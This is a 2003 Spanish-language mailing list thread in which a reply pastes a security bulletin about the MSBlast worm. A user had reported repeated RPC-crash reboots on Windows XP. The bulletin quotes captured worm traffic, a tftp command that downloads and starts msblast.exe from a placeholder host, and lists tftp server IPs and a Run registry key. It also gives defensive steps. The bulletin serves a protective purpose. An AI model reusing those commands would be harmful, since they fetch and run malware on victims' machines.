| Asunto: | Re: [SauloNet] RPC termino inesperadamente.... | | Fecha: | Martes, 12 de Agosto, 2003 11:51:42 (+0200) | | Autor: | dgonzalez <dgonzalez @........com>
|
Pego la noticia que me acaba de llegar, y que es muy posible que te haya
afectado:
Hemos empezado a recibir informes de un nuevo gusano que se está
empezando a propagar. Utiliza la reciente vulnerabilidad descubierta en
el mecanismo RPC de todas las versiones de Windows. En el momento de
redactar este boletín de urgencia todavía no se conoce en detalle el
funcionamiento del gusano, ya que todavía está siendo analizado. Uno de
los efectos de este gusano es que provoca al reinicio del ordenador
infectado cada pocos minutos. A pesar de no disponer de muchos datos
acerca del mismo, hemos decidido publicar este boletín para advertir a
todos los lectores de 'una-al-día' sobre su existencia así como indicar
las medidas necesarias a tomar para evitar su propagación.
El gusano realiza un barrido de las direcciones IP con el objeto de
identificar los sistemas Windows vulnerables (sistemas con el puerto
135/tcp accesible). Cuando detecta la existencia de un sistema
vulnerable, utiliza la vulnerabilidad RPC para abrir una sesión del
intérprete de órdenes accesible de forma remota a través del puerto
4444/tcp.
Dentro de esta sesión, procede a descargar mediante tftp el código
binario de gusano. Este es el tráfico capturado de una máquina
infectada:
-------------tráfico 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
-------------tráfico 4444/tcp----------
mblast.exe es un archivo ejecutable de Windows, comprimido y que ocupa 6
KB. Su hash MD5 es
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
La descarga del mismo puede realizarse contra uno de estos servidores
tftp:
204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3
El gusano crea una entrada en el registro de Windows para ejecutarse
automáticamente cada vez que se arranca el sistema:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"windows auto update"="msblast.exe"
Más vale prevenir que curar
Para evitar la entrada del gusano, es importante verificar estos dos
aspectos clave:
1. Impedir las conexiones al puerto 135/tcp procedente de redes
inseguras, como puede ser Internet.
2. Verificar que se ha aplicado la actualización publicada por Microsoft
para eliminar la vulnerabilidad RPC. Esta actualización está disponible
a través del servicio Windows Update o bien descargando la actualización
específica (ver el "una-al-día" del pasado 18 de julio para las URL de
la actualización para cada versión de Windows).
Eliminación del virus
Los diferentes fabricantes de productos antivirus están en estos
momentos analizando el gusano y es de esperar que en pocos minutos
dispongan de actualizaciones que permitan eliminarlo. Aconsejamos a
todos los lectores de 'una-al-día' que procedan a realizar una
actualización del archivo de firmas de su programa antivirus y, a
continuación, una verificación integral de su ordenador.
Por favor, responda a consultas@usuarios.saulo.net
Destinatarios: consultas@usuarios.saulo.net
CC:
Asunto: [SauloNet] RPC termino inesperadamente....
Lunes, 11 de Agosto de 2003 (10:37 p.m.)
Hola !
AMIGOS ! ayuda URGENTE............hace una semna que tengo
funcionando WINDOWS XP (castellano, SP 1, version CORPORATIVA) sin
probelmas, y de un moemnto para otro, comenzo a
aparecerme un cartelito que dice :
" EL SERVICIO DE LLAMADA A PROCEDIMINETO REMOTO (rpc) A FINALIZADO
INESPERADAMENTE, EL EQUIPO SE REINICIARA EN XX SEGUNODS (60
segunos)"
A partir de eso, comienza una ceunta regresiva y al terminar SE
REINICIA WINDOWS cerrando TODOS mis programas....SIN PODER HACER
NADA........
si alguien le paso lo mismo y lo pudo solucionar POR FAVOPR
RESPONDA..y si alguien sabe el MOTIVO mejor..........
espero pronta rta !!!!!!!!!
Gracias
Hasta pronto.
--------------------------
Lic. Javier Martinez
Icq # 13576047
lic_javier_martinez@yahoo.com.ar
> Yo use con bastante exito un programa llamado VNC que lo puedes bajar
gratis
> de www.realvnc.com. Es muy sencillo y si no pretendes grandes
prestaciones
> es mas conveniente que el PC Anywhere.
> Saludos
> Entre otras cosas me conecté a una maquina con W2000 desde una W98 sin
> ningun problema
> ----- Original Message -----
> From: "convalsa" <convalsa@cantv.net>
> To: <consultas@usuarios.saulo.net>
> Sent: Monday, August 11, 2003 12:28 PM
> Subject: [SauloNet] asesoria acceso remoto
> saludos saulo
> quiseira ver si me puedes ayudar
> tengo una red de 16 maquinas con una conexion a internet sobre puerta de
> enlace pero como podria conectarme remotamente desde un equipo con
windows
> xp profesional a uno con windows 98 se. por favor si es una aplicacion
> gratis y que no sea muy complicada he hechos conexiones a escritorio
remoto
> pero solo con equipos que tienen windows xp pero cuando intento conectar
a
> otra plataforma no me lo permite incluso instale el sofware de conexion
> remota que trae windows xp para otras maquinas y me puedo conextar
> remotamente con maquinas desde windows 98 se a eindows xp pero no me
permite
> conectarme al contrario si puedes por favor te lo agracesco saulo atn.
> heriberto Chirino. grasias
> ____________________________
> La lista de consultas y comentarios relacionados con Saulo.Net
> Información, bajas y altas en http://www.saulo.net/lista/
> ____________________________
> La lista de consultas y comentarios relacionados con Saulo.Net
> Información, bajas y altas en http://www.saulo.net/lista/
____________________________
La lista de consultas y comentarios relacionados con Saulo.Net
Información, bajas y altas en http://www.saulo.net/lista/
--------------------------------------------------------------------------------------------------------------------------------------
ADVERTENCIA DE CONFIDENCIALIDAD:
Este mensaje se dirige exclusivamente a su(s) destinatario(s) y puede
contener información
privilegiada o confidencial. El acceso a esta notificación por otras
personas distintas a las
designadas no está autorizado. Si Vd. no es el destinatario indicado,
queda notificado que
la utilización, divulgación y/o copia sin autorización está prohibida
en virtud de la
legislación vigente. Si ha recibido este mensaje por error, por favor
le rogamos que lo
comunique inmediatamente al remitente vía e-mail y proceda a su
destrucción.
CONFIDENTIALITY NOTICE:
This message is intended exclusively for its addressee and may
contain confidential or
privileged information. Access to this email by anyone else is
unauthorised. If you are not the
intended recipient you are hereby notified that any dissemination,
copy or disclosure of
this communication is strictly prohibited by law. If this message has
been received in
error, please immediately notify us via e-mail and delete it.
|
Re: RPC termino in
Responder a este mensaje